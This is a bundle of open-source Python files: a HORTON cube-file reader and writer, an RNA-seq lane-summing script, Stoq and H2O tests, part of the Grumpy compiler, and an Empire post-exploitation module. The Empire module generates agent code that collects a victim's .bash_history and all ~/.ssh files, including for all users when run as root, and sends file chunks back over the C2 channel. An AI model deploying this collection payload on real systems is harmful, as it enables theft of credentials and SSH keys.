'''Load data from a cube file
**Arguments:**
filename
The name of the cube file
**Returns** a dictionary with ``title``, ``coordinates``, ``numbers``,
``cube_data``, ``grid``, ``pseudo_numbers``.
'''
with open(filename) as f:
title, coordinates, numbers, cell, ugrid, pseudo_numbers = _read_cube_header(f)
data = _read_cube_data(f, ugrid)
return {
'title': title,
'coordinates': coordinates,
'numbers': numbers,
'cell': cell,
'cube_data': data,
'grid': ugrid,
'pseudo_numbers': pseudo_numbers,
}
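# A minimal usage sketch (hedged; "water.cube" is a hypothetical file name):
#
#   mol = load_cube('water.cube')
#   print mol['title'], mol['cube_data'].shape  # shape matches the header grid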
def _write_cube_header(f, title, coordinates, numbers, ugrid, pseudo_numbers):
print >> f, title
print >> f, 'OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z'
natom = len(numbers)
x, y, z = ugrid.origin
print >> f, '%5i % 11.6f % 11.6f % 11.6f' % (natom, x, y, z)
rvecs = ugrid.grid_rvecs
for i in xrange(3):
x, y, z = rvecs[i]
print >> f, '%5i % 11.6f % 11.6f % 11.6f' % (ugrid.shape[i], x, y, z)
for i in xrange(natom):
q = pseudo_numbers[i]
x, y, z = coordinates[i]
print >> f, '%5i % 11.6f % 11.6f % 11.6f % 11.6f' % (numbers[i], q, x, y, z)
def _write_cube_data(f, cube_data):
counter = 0
for value in cube_data.flat:
f.write(' % 12.5E' % value)
if counter%6 == 5:
f.write('\n')
counter += 1
def dump_cube(filename, data):
'''Write an IOData instance to a .cube file.
**Arguments:**
filename
The name of the file to be written. This usually has the extension
".cube".
data
An IOData instance. Must contain ``coordinates``, ``numbers``,
``grid``, ``cube_data``. May contain ``title``, ``pseudo_numbers``.
'''
with open(filename, 'w') as f:
if not isinstance(data.grid, UniformGrid):
raise ValueError('The system grid must be a UniformGrid instance.')
title = getattr(data, 'title', 'Created with HORTON')
_write_cube_header(f, title, data.coordinates, data.numbers, data.grid, data.pseudo_numbers)
_write_cube_data(f, data.cube_data)
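# A minimal round-trip sketch (hedged; assumes `data` is an IOData-like object
# carrying coordinates, numbers, grid and cube_data as described above):
#
#   dump_cube('copy.cube', data)
#   assert load_cube('copy.cube')['cube_data'].shape == data.cube_data.shape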
|
crisely09/horton
|
horton/io/cube.py
|
Python
|
gpl-3.0
| 5,383
|
[
"Gaussian"
] |
0e32547ae0b3a7be6e8bcbc0db0a621fd33d81f45d798c51a106bdc38c9c5f99
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Linux PillageUser',
# list of one or more authors for the module
'Author': ['@harmj0y'],
# more verbose multi-line description of the module
'Description': ("Pillages the current user for their bash_history, ssh known hosts, "
"recent folders, etc. "),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Sleep' : {
'Description' : "Switch. Sleep the agent's normal interval between downloads, otherwise use one blast.",
'Required' : False,
'Value' : 'True'
},
'AllUsers' : {
'Description' : "Switch. Run for all users (needs root privileges!)",
'Required' : False,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
sleep = self.options['Sleep']['Value']
allUsers = self.options['AllUsers']['Value']
script = """
import os
# custom function to send download packets back
def downloadFile(path):
import os
filePath = os.path.expanduser(path)
if os.path.isfile(filePath):
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get the next chunk of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset)
partData = "%%s|%%s|%%s" %%(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '': break
sendMessage(encodePacket(41, partData))
# if we're choosing to sleep between file part downloads
if "%(sleep)s".lower() == "true":
global minSleep
global maxSleep
minSleep = (1.0-jitter)*delay
maxSleep = (1.0+jitter)*delay
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 5120000
searchPaths = ['/.bash_history']
if "%(allUsers)s".lower() == "true":
d='/home/'
userPaths = [os.path.join(d,o) for o in os.listdir(d) if os.path.isdir(os.path.join(d,o))]
userPaths += ["/root/"]
else:
userPaths = ['~/']
for userPath in userPaths:
for searchPath in searchPaths:
#downloadFile(userPath + searchPath)
print userPath + searchPath
# grab all .ssh files
filePath = os.path.expanduser(userPath + '/.ssh/')
if os.path.exists(filePath):
sshFiles = [f for f in os.listdir(filePath) if os.path.isfile(os.path.join(filePath, f))]
for sshFile in sshFiles:
# downloadFile(userPath + '/.ssh/' + sshFile)
print userPath + '/.ssh/' + sshFile
print "pillaging complete"
""" % {'sleep': sleep, 'allUsers': allUsers}
return script
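# A minimal usage sketch (hedged; mainMenu=None is a stand-in here -- a real
# Empire menu object would normally be supplied):
#
#   m = Module(mainMenu=None, params=[['Sleep', 'False'], ['AllUsers', 'True']])
#   src = m.generate()  # "%(sleep)s" / "%(allUsers)s" are substituted into the script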
|
EmpireProject/Empire
|
lib/modules/python/collection/linux/pillage_user.py
|
Python
|
bsd-3-clause
| 5,008
|
[
"BLAST"
] |
7b665c36bc3f0de941a7c5db1c9a547dbc4496339cfd3b8e2d78bd2d8379d9ee
|
import os
import sys
from utils import *
import operator
from time import localtime, strftime
import argparse
import re
import sh
import pandas as pd
# cd /nfs3/PHARM/Morgun_Lab/richrr/Type2_Diabetes/RNA-Seq/analysis/summarize_per_sample
# usage: python ~/Morgun_Lab/richrr/scripts/python/sum_data_from_lanes_per_sample.py -i data_per_lane.txt -b rnaseqil
#cd /nfs3/PHARM/Morgun_Lab/richrr/Milena_data_050917/analysis
# python ~/Morgun_Lab/richrr/scripts/python/sum_data_from_lanes_per_sample.py -i suumarized-htseq-results.csv -b ignore -d , -s 5
# sort it first on the prefix and then suffix of the "strng"
def sort_headers(names, strng):
return sorted(names, key=lambda x: (int(x.split(strng)[0]), int(x.split(strng)[1])))
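# e.g. sort_headers(['11rnaseq2', '2rnaseq1', '11rnaseq1'], 'rnaseq')
# returns ['2rnaseq1', '11rnaseq1', '11rnaseq2'] -- numeric sort on the
# prefix around the buffer string first, then on the suffix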
def main(args):
# extract the statistics from the log
parser = argparse.ArgumentParser(description='sum the number of reads from different lanes per sample. The current delimiter is _L00')
parser.add_argument('-i', '--infile')
parser.add_argument('-o', '--outfile', default="summed-values.txt") # output filename
parser.add_argument('-d', '--delimiter', default='\t') # delimiter for file
parser.add_argument('-l', '--lanedelimit', default='_L00') # delimiter for identifying lanes
parser.add_argument('-r', '--rowid', default=0) # 0-based index of column to be used for row id
parser.add_argument('-s', '--skiprowsafterheader', default=0) # skip the top x rows using index after header
# to skip three rows following header, give -s 3
# so in htseq results it could be the top 5 rows after header with __, give -s 5
parser.add_argument('-b', '--buffr') # the buffer string is used to split the sample names and is used
# when arranging the sample order in the output file
# for samples named 11rnaseq1, 11rnaseq2, 12rnaseq1, ...the -b is rnaseq
# the samples are first sorted using prefix of rnaseq and then suffix of rnaseq
args = parser.parse_args()
if len(sys.argv)==1 :
parser.print_help()
sys.exit('\nat least one argument required\n')
infile = args.infile
buffr = args.buffr
outfile = args.outfile
delim = args.delimiter
lanedelimit = args.lanedelimit
skiprows = int(args.skiprowsafterheader) # here skiprows is an int
if skiprows > 0: # here skiprows becomes a index based list
skiprows = range(1, 1+skiprows) # range(1,1+3) == [1, 2, 3], since with read_table the file is read with header as 0, so skip the next 3 lines, is index 1,2,3
# get the header line from the big file
header_line = ''
with open(infile, 'r') as f:
header_line = f.readline().strip()
#print header_line
# create a dict on the sample name and the different lanes to be summed
sample_lanes_dict = dict()
for entry in header_line.split(delim)[1:]: # here we are ignoring the header of the first column (e.g. ID, SampleID)
entry = entry.strip()
# split the entry with the lane delimiter and fill the dictionary
contents = entry.split(lanedelimit)
key = contents[0]
#print entry
if key in sample_lanes_dict:
sample_lanes_dict[key].append(entry)
else:
sample_lanes_dict[key] = [entry]
#print sample_lanes_dict
# sort the samples using the prefix and suffix of the buffr string
headers = sample_lanes_dict.keys()
if buffr != 'ignore':
headers = sort_headers(sample_lanes_dict.keys(), buffr)
# read the full file as a data frame
df = pd.read_table(infile, index_col = args.rowid, skiprows=skiprows, sep=delim)
print df.head()
### do not use this code below. use skiprows during read_table
# after reading the file, the header is not counted as a row. start skipping from row 1 (index 0)
#if(skiprows>0):
# df = df.drop(df.index[[0,1,2,3,4]])
###
# create an empty df with the required row and column names
df_ = pd.DataFrame(index=list(df.index), columns=headers)
df_ = df_.fillna('NaN')
#print df_.head()
# sum the specific columns of the data frame
# https://stackoverflow.com/questions/25748683/pandas-sum-dataframe-rows-for-given-columns
for key in headers:
value = sample_lanes_dict[key]
print key, value
df_[key] = df[value].sum(axis=1)
print df_.head()
df_.to_csv(outfile, sep=delim, index_label=header_line.split(delim)[0])
# print the column names
print "Check the order of samples"
print '\n'.join(list(df_))
print "Done"
#sys.exit()
if __name__=='__main__':
datetime = strftime("%a, %d %b %Y %I:%M:%S %p", localtime())
cmd = 'echo ' + datetime
os.system(cmd)
main(sys.argv)
|
richrr/scripts
|
python/sum_data_from_lanes_per_sample.py
|
Python
|
gpl-3.0
| 5,060
|
[
"HTSeq"
] |
13b264fe01ad2f053142eb4bb2ccb031544b57129fdffcda886ec0e45498ffa5
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2013 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import itertools
import unittest
import mock
from stoqlib.database.orm import ORMObject
from stoqlib.database.tables import get_table_types, _tables_cache
from stoqlib.domain.plugin import InstalledPlugin
from stoqlib.domain.test.domaintest import DomainTest
from stoqlib.lib.introspection import get_all_classes
def _introspect_tables():
for klass in itertools.chain(get_all_classes('stoqlib/domain'),
get_all_classes('plugins')):
try:
if not issubclass(klass, ORMObject):
continue
except TypeError:
continue
if getattr(klass, '__storm_table__', 'invalid') == 'invalid':
continue
yield klass
class TableTypeTest(DomainTest):
@mock.patch('stoqlib.lib.pluginmanager.get_default_store')
def test(self, get_default_store):
# FIXME: get_table_types need plugins to be installed to get the
# plugin's tables. PluginManager.installed_plugins_names will use the
# default store to get the installed plugins, so mock it to the tests'
# store, create all the missing InstalledPlugin. Change this to a mock
# on installed_plugins_names when we can use newer versions of
# python-mock (which properly supports property mocking)
get_default_store.return_value = self.store
for p_name in self.get_oficial_plugins_names():
if self.store.find(InstalledPlugin, plugin_name=p_name).is_empty():
InstalledPlugin(store=self.store,
plugin_name=p_name, plugin_version=1)
# Depending on the order this test is run, the cache may already be
# filled. Clear it so it imports again and picks up the plugins too.
_tables_cache.clear()
expected = set(t.__name__ for t in get_table_types())
introspected = set(t.__name__ for t in _introspect_tables())
# Tables in either expected or introspected but not both
difference = expected ^ introspected
if difference:
self.fail("Missing tables: %s\n"
"Please add them to stoqlib.database.tables or to the "
"plugin's get_tables" % (', '.join(sorted(difference), )))
if __name__ == '__main__':
unittest.main()
|
andrebellafronte/stoq
|
tests/test_tables.py
|
Python
|
gpl-2.0
| 3,219
|
[
"VisIt"
] |
1e932770888376be4c2b88fa6aeadf2dcc6dc265d71b542572c6ed7b5252b66e
|
import unittest, re, sys, random
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_hosts, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global localhost
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(node_count=1)
else:
h2o_hosts.build_cloud_with_hosts(node_count=1)
global SYNDATASETS_DIR
SYNDATASETS_DIR = h2o.make_syn_dir()
h2o.beta_features = True
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_A_many_parse1(self):
rows = self.genrows1()
set = 1
self.tryThemAll(set, rows, enumsOnly=False)
def test_B_many_parse2(self):
rows = self.genrows2()
set = 2
self.tryThemAll(set, rows, enumsOnly=True)
# this one has problems with blank lines
def test_C_many_parse3(self):
rows = self.genrows3()
set = 3
self.tryThemAll(set, rows, enumsOnly=True)
def genrows1(self):
# comment has to have # in first column? (no leading whitespace)
# FIX! what about blank fields and spaces as sep
# FIX! temporary need more lines to avoid sample error in H2O
# throw in some variants for leading 0 on the decimal, and scientific notation
# new: change the @ to an alternate legal SEP if the special HIVE SEP is in play
rows = [
# get rid of comments. We don't really support?
# "# 'comment, is okay",
# '# "this comment, is okay too',
# "# 'this' comment, is okay too",
# don't test comma's in the header. get rid of all secondary separator-like char here
# "@FirstName@|@Middle@Initials@|@LastName@|@Date@of@Birth@", # had to remove the trailing space to avoid bad parse
"FirstName|MiddleInitials|LastName|DateofBirth", # had to remove the trailing space to avoid bad parse
"0|0.5|1|0",
"3|NaN|4|1",
"6||8|0",
"0.6|0.7|0.8|1",
"+0.6|+0.7|+0.8|0",
"-0.6|-0.7|-0.8|1",
".6|.7|.8|0",
"+.6|+.7|+.8|1",
"-.6|-.7|-.8|0",
"+0.6e0|+0.7e0|+0.8e0|1",
"-0.6e0|-0.7e0|-0.8e0|0",
".6e0|.7e0|.8e0|1",
"+.6e0|+.7e0|+.8e0|0",
"-.6e0|-.7e0|-.8e0|1",
"+0.6e00|+0.7e00|+0.8e00|0",
"-0.6e00|-0.7e00|-0.8e00|1",
".6e00|.7e00|.8e00|0",
"+.6e00|+.7e00|+.8e00|1",
"-.6e00|-.7e00|-.8e00|0",
"+0.6e-01|+0.7e-01|+0.8e-01|1",
"-0.6e-01|-0.7e-01|-0.8e-01|0",
".6e-01|.7e-01|.8e-01|1",
"+.6e-01|+.7e-01|+.8e-01|0",
"-.6e-01|-.7e-01|-.8e-01|1",
"+0.6e+01|+0.7e+01|+0.8e+01|0",
"-0.6e+01|-0.7e+01|-0.8e+01|1",
".6e+01|.7e+01|.8e+01|0",
"+.6e+01|+.7e+01|+.8e+01|1",
"-.6e+01|-.7e+01|-.8e+01|0",
"+0.6e102|+0.7e102|+0.8e102|1",
"-0.6e102|-0.7e102|-0.8e102|0",
".6e102|.7e102|.8e102|1",
"+.6e102|+.7e102|+.8e102|0",
"-.6e102|-.7e102|-.8e102|1",
]
return rows
# "# comment here is okay",
# "# comment here is okay too",
# FIX! needed an extra line to avoid bug on default 67+ sample?
def genrows2(self):
rows = [
"First@Name|@MiddleInitials|LastName@|Date@ofBirth",
"Kalyn|A.|Dalton|1967-04-01",
"Gwendolyn|B.|Burton|1947-10-26",
"Elodia|G.|Ali|1983-10-31",
"Elo@dia|@G.|Ali@|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31"
]
return rows
# update spec
# intermixing blank lines in the first two lines breaks things
# blank lines cause all columns except the first to get NA (red)
# first may get a blank string? (not ignored)
def genrows3(self):
rows = [
"# comment here is okay",
"# comment here is okay too",
"FirstName|MiddleInitials|LastName|DateofBirth",
"Kalyn|A.|Dalton|1967-04-01",
"",
"Gwendolyn||Burton|1947-10-26",
"",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
]
return rows
# The 3 supported line-ends
# FIX! should test them within quoted tokens
eolDict = {
0:"\n",
1:"\r\n",
2:"\r"
}
# tab here will cause problems too?
# 5:['"\t','\t"'],
# 8:["'\t","\t'"]
tokenChangeDict = {
0:['',''],
1:['\t','\t'],
2:[' ',' '],
3:['"','"'],
4:['" ',' "'],
5:["'","'"],
6:["' "," '"],
}
# flip in more characters to confuse the separator decisions. for enum test data only
tokenChangeDictEnumsOnly = {
0:[' a\t','\ta '],
1:['\t a','a \t'],
2:['',''],
3:['\t','\t'],
4:[' ',' '],
5:['"','"'],
6:['" ',' "'],
7:["'","'"],
8:["' "," '"],
}
def changeTokens(self, rows, tokenCase, tokenChangeDict):
[cOpen,cClose] = tokenChangeDict[tokenCase]
newRows = []
for r in rows:
# don't quote lines that start with #
# can quote lines start with some spaces or tabs? maybe
comment = re.match(r'^[ \t]*#', r)
empty = re.match(r'^$',r)
if not (comment or empty):
r = re.sub('^',cOpen,r)
r = re.sub('\|',cClose + '|' + cOpen,r)
r = re.sub('$',cClose,r)
h2o.verboseprint(r)
newRows.append(r)
return newRows
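# e.g. changeTokens(['a|b'], 3, tokenChangeDict) wraps every field in double
# quotes and returns ['"a"|"b"']; comment and empty lines pass through as-is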
def writeRows(self,csvPathname,rows,eol):
# use a context manager so the file is flushed and closed before parsing
with open(csvPathname, 'w') as f:
for r in rows:
f.write(r + eol)
# what about case of missing eol at end of file?
sepChangeDict = {
# NEW: 0x01 can be SEP character for Hive datasets
0:"",
1:",",
2:" ",
3:"\t",
}
def changeSep(self,rows,sepCase):
# do a trial replace, to see if we get a <tab><sp> problem
# comments at the beginning..get a good row
r = rows[-1]
tabseptab = re.search(r'\t\|\t', r)
spsepsp = re.search(r' \| ', r)
if tabseptab or spsepsp:
# use comma instead. always works
# print "Avoided"
newSep = ","
else:
newSep = self.sepChangeDict[sepCase]
newRows = [r.replace('|',newSep) for r in rows]
# special case, if using the HIVE sep, substitute randomly
# one of the other SEPs into the "@" in the template
# FIX! we need to add HIVE lineends into lineend choices.
# assuming that lineend
if newSep == "":
# don't use the same SEP to swap in.
randomOtherSep = random.choice(self.sepChangeDict.values())
while (randomOtherSep==newSep):
randomOtherSep = random.choice(self.sepChangeDict.values())
newRows = [r.replace('@',randomOtherSep) for r in newRows]
return newRows
def tryThemAll(self, set, rows, enumsOnly=False):
for eolCase in range(len(self.eolDict)):
eol = self.eolDict[eolCase]
# change tokens must be first
if enumsOnly:
tcd = self.tokenChangeDictEnumsOnly
else:
tcd = self.tokenChangeDict
for tokenCase in range(len(tcd)):
newRows1 = self.changeTokens(rows, tokenCase, tcd)
for sepCase in range(len(self.sepChangeDict)):
newRows2 = self.changeSep(newRows1,sepCase)
csvPathname = SYNDATASETS_DIR + '/parsetmp_' + \
str(set) + "_" + \
str(eolCase) + "_" + \
str(tokenCase) + "_" + \
str(sepCase) + \
'.data'
self.writeRows(csvPathname,newRows2,eol)
if "'" in tcd[tokenCase][0]:
single_quotes = 1
else:
single_quotes = 0
parseResult = h2i.import_parse(path=csvPathname, schema='put', single_quotes=single_quotes,
noPrint=not h2o.verbose)
h2o_cmd.runRF(parseResult=parseResult, trees=1,
timeoutSecs=10, retryDelaySecs=0.1, noPrint=True, print_params=True)
h2o.verboseprint("Set", set)
h2o.check_sandbox_for_errors()
sys.stdout.write('.')
sys.stdout.flush()
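# Each tryThemAll call exercises the full cross product: 3 line endings x
# len(tcd) token stylings x 4 separators, writing one synthetic file per
# combination and sanity-checking the parse with a 1-tree RF run.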
if __name__ == '__main__':
h2o.unit_main()
|
woobe/h2o
|
py/testdir_single_jvm/test_parse_many_cases_fvec.py
|
Python
|
apache-2.0
| 9,060
|
[
"Dalton"
] |
c6ed6b6d9135a3f84a767b2feb6a7d278acf3d2a96c518c67163cb09605a462f
|
# coding=utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Visitor class for traversing Python statements."""
import ast
import string
import textwrap
from grumpy.compiler import block
from grumpy.compiler import expr
from grumpy.compiler import expr_visitor
from grumpy.compiler import util
_NATIVE_MODULE_PREFIX = '__go__.'
_NATIVE_TYPE_PREFIX = 'type_'
_nil_expr = expr.nil_expr
class StatementVisitor(ast.NodeVisitor):
"""Outputs Go statements to a Writer for the given Python nodes."""
# pylint: disable=invalid-name,missing-docstring
def __init__(self, block_):
self.block = block_
self.writer = util.Writer()
self.expr_visitor = expr_visitor.ExprVisitor(self.block, self.writer)
def generic_visit(self, node):
msg = 'node not yet implemented: {}'.format(type(node).__name__)
raise util.ParseError(node, msg)
def visit_Assert(self, node):
self._write_py_context(node.lineno)
# TODO: Only evaluate msg if cond is false.
with self.expr_visitor.visit(node.msg) if node.msg else _nil_expr as msg,\
self.expr_visitor.visit(node.test) as cond:
self.writer.write_checked_call1(
'πg.Assert(πF, {}, {})', cond.expr, msg.expr)
def visit_AugAssign(self, node):
op_type = type(node.op)
if op_type not in StatementVisitor._AUG_ASSIGN_TEMPLATES:
fmt = 'augmented assignment op not implemented: {}'
raise util.ParseError(node, fmt.format(op_type.__name__))
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.target) as target,\
self.expr_visitor.visit(node.value) as value,\
self.block.alloc_temp() as temp:
self.writer.write_checked_call2(
temp, StatementVisitor._AUG_ASSIGN_TEMPLATES[op_type],
lhs=target.expr, rhs=value.expr)
self._assign_target(node.target, temp.expr)
def visit_Assign(self, node):
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.value) as value:
for target in node.targets:
self._tie_target(target, value.expr)
def visit_Break(self, node):
self._write_py_context(node.lineno)
self.writer.write('goto Label{}'.format(self.block.top_loop().end_label))
def visit_ClassDef(self, node):
# Since we only care about global vars, we end up throwing away the locals
# collected by BlockVisitor. But use it anyway since it buys us detection of
# assignment to vars that are later declared global.
block_visitor = block.BlockVisitor()
for child in node.body:
block_visitor.visit(child)
global_vars = {v.name for v in block_visitor.vars.values()
if v.type == block.Var.TYPE_GLOBAL}
# Visit all the statements inside body of the class definition.
body_visitor = StatementVisitor(block.ClassBlock(
self.block, node.name, global_vars))
# Indent so that the function body is aligned with the goto labels.
with body_visitor.writer.indent_block():
body_visitor._visit_each(node.body) # pylint: disable=protected-access
self._write_py_context(node.lineno)
with self.block.alloc_temp('*πg.Dict') as cls, \
self.block.alloc_temp() as mod_name, \
self.block.alloc_temp('[]*πg.Object') as bases, \
self.block.alloc_temp() as meta:
self.writer.write('{} = make([]*πg.Object, {})'.format(
bases.expr, len(node.bases)))
for i, b in enumerate(node.bases):
with self.expr_visitor.visit(b) as b:
self.writer.write('{}[{}] = {}'.format(bases.expr, i, b.expr))
self.writer.write('{} = πg.NewDict()'.format(cls.name))
self.writer.write_checked_call2(
mod_name, 'πF.Globals().GetItem(πF, {}.ToObject())',
self.block.intern('__name__'))
self.writer.write_checked_call1(
'{}.SetItem(πF, {}.ToObject(), {})',
cls.expr, self.block.intern('__module__'), mod_name.expr)
tmpl = textwrap.dedent("""
_, πE = πg.NewCode($name, $filename, nil, 0, func(πF *πg.Frame, _ []*πg.Object) (*πg.Object, *πg.BaseException) {
\tπClass := $cls
\t_ = πClass""")
self.writer.write_tmpl(tmpl, name=util.go_str(node.name),
filename=util.go_str(self.block.filename),
cls=cls.expr)
with self.writer.indent_block():
self.writer.write_temp_decls(body_visitor.block)
self.writer.write_block(body_visitor.block,
body_visitor.writer.out.getvalue())
tmpl = textwrap.dedent("""\
}).Eval(πF, πF.Globals(), nil, nil)
if πE != nil {
\treturn nil, πE
}
if $meta, πE = $cls.GetItem(πF, $metaclass_str.ToObject()); πE != nil {
\treturn nil, πE
}
if $meta == nil {
\t$meta = πg.TypeType.ToObject()
}""")
self.writer.write_tmpl(tmpl, meta=meta.name, cls=cls.expr,
metaclass_str=self.block.intern('__metaclass__'))
with self.block.alloc_temp() as type_:
type_expr = ('{}.Call(πF, []*πg.Object{{πg.NewStr({}).ToObject(), '
'πg.NewTuple({}...).ToObject(), {}.ToObject()}}, nil)')
self.writer.write_checked_call2(
type_, type_expr, meta.expr,
util.go_str(node.name), bases.expr, cls.expr)
self.block.bind_var(self.writer, node.name, type_.expr)
def visit_Continue(self, node):
self._write_py_context(node.lineno)
self.writer.write('goto Label{}'.format(self.block.top_loop().start_label))
def visit_Delete(self, node):
self._write_py_context(node.lineno)
for target in node.targets:
if isinstance(target, ast.Attribute):
with self.expr_visitor.visit(target.value) as t:
self.writer.write_checked_call1(
'πg.DelAttr(πF, {}, {})', t.expr, self.block.intern(target.attr))
elif isinstance(target, ast.Name):
self.block.del_var(self.writer, target.id)
elif isinstance(target, ast.Subscript):
assert isinstance(target.ctx, ast.Del)
with self.expr_visitor.visit(target.value) as t,\
self.expr_visitor.visit(target.slice) as index:
self.writer.write_checked_call1('πg.DelItem(πF, {}, {})',
t.expr, index.expr)
else:
msg = 'del target not implemented: {}'.format(type(target).__name__)
raise util.ParseError(node, msg)
def visit_Expr(self, node):
self._write_py_context(node.lineno)
self.expr_visitor.visit(node.value).free()
def visit_For(self, node):
loop = self.block.push_loop()
orelse_label = self.block.genlabel() if node.orelse else loop.end_label
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.iter) as iter_expr, \
self.block.alloc_temp() as i, \
self.block.alloc_temp() as n:
self.writer.write_checked_call2(i, 'πg.Iter(πF, {})', iter_expr.expr)
self.writer.write_label(loop.start_label)
tmpl = textwrap.dedent("""\
if $n, πE = πg.Next(πF, $i); πE != nil {
\tisStop, exc := πg.IsInstance(πF, πE.ToObject(), πg.StopIterationType.ToObject())
\tif exc != nil {
\t\tπE = exc
\t\tcontinue
\t}
\tif !isStop {
\t\tcontinue
\t}
\tπE = nil
\tπF.RestoreExc(nil, nil)
\tgoto Label$orelse
}""")
self.writer.write_tmpl(tmpl, n=n.name, i=i.expr, orelse=orelse_label)
self._tie_target(node.target, n.expr)
self._visit_each(node.body)
self.writer.write('goto Label{}'.format(loop.start_label))
if node.orelse:
self.writer.write_label(orelse_label)
self._visit_each(node.orelse)
# Avoid label "defined and not used" in case there's no break statements.
self.writer.write('goto Label{}'.format(loop.end_label))
self.writer.write_label(loop.end_label)
self.block.pop_loop()
def visit_FunctionDef(self, node):
self._write_py_context(node.lineno)
func = self.expr_visitor.visit_function_inline(node)
self.block.bind_var(self.writer, node.name, func.expr)
def visit_Global(self, node):
self._write_py_context(node.lineno)
def visit_If(self, node):
# Collect the nodes for each if/elif/else body and write the dispatching
# switch statement.
bodies = []
# An elif clause is represented as a single If node within the orelse
# section of the previous If node. Thus this loop terminates once we are
# done all the elif clauses at which time the orelse var will contain the
# nodes (if any) for the else clause.
orelse = [node]
while len(orelse) == 1 and isinstance(orelse[0], ast.If):
ifnode = orelse[0]
with self.expr_visitor.visit(ifnode.test) as cond:
label = self.block.genlabel()
# We goto the body of the if statement instead of executing it inline
# because the body itself may be a goto target and Go does not support
# jumping to targets inside a block.
with self.block.alloc_temp('bool') as is_true:
self.writer.write_tmpl(textwrap.dedent("""\
if $is_true, πE = πg.IsTrue(πF, $cond); πE != nil {
\treturn nil, πE
}
if $is_true {
\tgoto Label$label
}"""), is_true=is_true.name, cond=cond.expr, label=label)
bodies.append((label, ifnode.body, ifnode.lineno))
orelse = ifnode.orelse
default_label = end_label = self.block.genlabel()
if orelse:
end_label = self.block.genlabel()
# The else is not represented by ast and thus there is no lineno.
bodies.append((default_label, orelse, None))
self.writer.write('goto Label{}'.format(default_label))
# Write the body of each clause.
for label, body, lineno in bodies:
if lineno:
self._write_py_context(lineno)
self.writer.write_label(label)
self._visit_each(body)
self.writer.write('goto Label{}'.format(end_label))
self.writer.write_label(end_label)
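# A small illustration of the elif chaining described above (hedged sketch):
#
#   ast.parse('if a:\n    pass\nelif b:\n    pass').body[0].orelse
#   # -> [<_ast.If object>]  (the elif clause is a nested If in orelse)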
def visit_Import(self, node):
self._write_py_context(node.lineno)
for alias in node.names:
if alias.name.startswith(_NATIVE_MODULE_PREFIX):
raise util.ParseError(
node, 'for native imports use "from __go__.xyz import ..." syntax')
with self._import(alias.name, 0) as mod:
asname = alias.asname or alias.name.split('.')[0]
self.block.bind_var(self.writer, asname, mod.expr)
def visit_ImportFrom(self, node):
self._write_py_context(node.lineno)
if node.module.startswith(_NATIVE_MODULE_PREFIX):
values = [alias.name for alias in node.names]
with self._import_native(node.module, values) as mod:
for alias in node.names:
# Strip the 'type_' prefix when populating the module. This means
# that, e.g. 'from __go__.foo import type_Bar' will populate foo with
# a member called Bar, not type_Bar (although the symbol in the
# importing module will still be type_Bar unless aliased). This bends
# the semantics of import but makes native module contents more
# sensible.
name = alias.name
if name.startswith(_NATIVE_TYPE_PREFIX):
name = name[len(_NATIVE_TYPE_PREFIX):]
with self.block.alloc_temp() as member:
self.writer.write_checked_call2(
member, 'πg.GetAttr(πF, {}, {}, nil)',
